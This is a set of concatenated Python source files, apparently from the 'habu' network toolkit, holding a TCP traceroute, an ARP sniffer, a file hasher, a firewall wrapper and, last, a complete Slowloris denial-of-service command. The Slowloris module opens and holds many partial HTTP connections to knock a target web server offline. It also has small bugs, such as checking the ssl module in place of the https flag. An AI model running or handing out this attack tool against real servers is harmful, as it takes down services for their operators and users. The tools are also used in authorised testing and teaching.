import click
from scapy.all import ICMP, IP, conf, sr1, UDP, TCP


@click.command()
@click.argument('ip')
@click.option('-p', 'port', default=80, help='Port to use (default: 80)')
@click.option('-i', 'iface', default=None, help='Interface to use')
def cmd_traceroute(ip, port, iface):

    conf.verb = False

    if iface:
        conf.iface = iface

    pkts = IP(dst=ip, ttl=(1, 16)) / TCP(dport=port)

    for pkt in pkts:

        ans = sr1(pkt, timeout=1, iface=conf.iface)

        if not ans:
            print('.')
            continue

        print(ans.summary())

        if TCP in ans and ans[TCP].flags == 18:
            break

    return True


if __name__ == '__main__':
    cmd_traceroute()




from time import time
import click
import habu.lib.manuf
from scapy.all import ARP, IP, TCP, sniff

hosts = {}

mac2vendor = habu.lib.manuf.MacParser()


def procpkt(pkt):

    now = time()
    output = '{seconds}\t{ip}\t{hwaddr}\t{vendor}'

    if 'ARP' in pkt:
        hosts[pkt[ARP].psrc] = {}
        hosts[pkt[ARP].psrc]['hwaddr'] = pkt[ARP].hwsrc
        hosts[pkt[ARP].psrc]['vendor'] = mac2vendor.get_comment(pkt[ARP].hwsrc)
        hosts[pkt[ARP].psrc]['time'] = time()

        click.clear()

        for ip in sorted(hosts):
            print(output.format(
                seconds = int(now - hosts[ip]['time']),
                ip = ip,
                hwaddr = hosts[ip]['hwaddr'],
                vendor = hosts[ip]['vendor']
            ))


@click.command()
def cmd_arpsniff():
    """ ARP Sniffer """
    sniff(filter="arp", store=False, prn=procpkt)


if __name__ == '__main__':
    cmd_arpsniff()




import requests
import requests_cache
from pathlib import Path
import habu.conf
import pickle
import shelve
from bs4 import BeautifulSoup
from pprint import pprint

db = shelve.open(habu.conf.workspace + '/db.shelve', writeback=True)

def analyze():

    if 'tech' not in db:
        db['tech'] = {}

    for r in db['requests']:
        host = r.request.url
        if 'Server' in r.headers:
            db['tech'][host] = { 'server': r.headers['Server'] }

    pprint(db['tech'])
    db.close()

if __name__ == '__main__':
    analyze()





import click
from habu.lib import contest

@click.command()
def cmd_contest():
    """Example script."""
    print("IP:    %s" % contest.check_ip())
    print("DNS:   %s" % contest.check_dns())
    print("FTP:   %s" % contest.check_ftp())
    print("SSH:   %s" % contest.check_ssh())
    print("HTTP:  %s" % contest.check_http())
    print("HTTPS: %s" % contest.check_https())



import os

FILEDIR = os.path.dirname(os.path.abspath(__file__))
DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data'))
workspace = '/tmp/habu-workspace'

SERVICES_FILE_TCP = os.path.abspath(os.path.join(DATADIR, 'services-tcp'))
SERVICES_FILE_UDP = os.path.abspath(os.path.join(DATADIR, 'services-udp'))





import click
from habu.lib.hasher import hasher, ALGOS


@click.command()
@click.argument('f', type=click.File('rb'))
@click.option('-a', 'algorithm', default=None, type=click.Choice(ALGOS), help='Only this algorithm (Default: all)')
def cmd_hasher(f, algorithm):
    """Hasher"""

    data = f.read()

    if not data:
        print("Empty file or string!")
        return 1

    if algorithm:
        print(hasher(data, algorithm)[algorithm])
    else:
        for algo, result in hasher(data).items():
            print("{:<12}: {}".format(algo, result))

if __name__ == '__main__':
    cmd_hasher()




#from habu.lib.firewall_bsd import FirewallBSD
from habu.lib.firewall_iptables import FirewallIPTables

import delegator

class Firewall():

    def __init__(self):
        if delegator.run('which iptables', block=True).return_code == 0:
            self.__class__ = FirewallIPTables
            self.__init__()





import click
from scapy.all import TCP, IP, conf, send
from time import sleep
import argparse
import logging
import random
import socket
import ssl
import sys
import time

def init_socket(host, port, https=False):

    ua = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(4)

    if ssl:
        s = ssl.wrap_socket(s)

    s.connect((host, port))

    s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
    s.send("User-Agent: {}\r\n".format(ua).encode())
    s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode())

    return s


@click.command()
@click.argument('host')
@click.option('-c', 'count', default=100, help='How many sockets (default: 100)')
@click.option('-p', 'port', default=80, help='Port to use (default: 80)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
@click.option('--https', is_flag=True, default=False, help='Use SSL/TLS (default: No)')
def cmd_slowloris(host, count, port, https, verbose):

    list_of_sockets = []

    socket_count = count
    print("Attacking %s with %s sockets.", host, socket_count)
    print("Creating sockets...")

    for _ in range(count):
        try:
            print("Creating socket nr %s", _)
            s = init_socket(host, port, https)
        except socket.error:
            break
        list_of_sockets.append(s)

    while True:
        print("Sending keep-alive headers... Socket count: %s", len(list_of_sockets))
        for s in list(list_of_sockets):
            try:
                s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
            except socket.error:
                list_of_sockets.remove(s)

        for _ in range(socket_count - len(list_of_sockets)):
            print("Recreating socket...")
            try:
                s = init_socket(host, port, https)
                if s:
                    list_of_sockets.append(s)
            except socket.error:
                break

        time.sleep(15)


if __name__ == '__main__':
    cmd_slowloris()

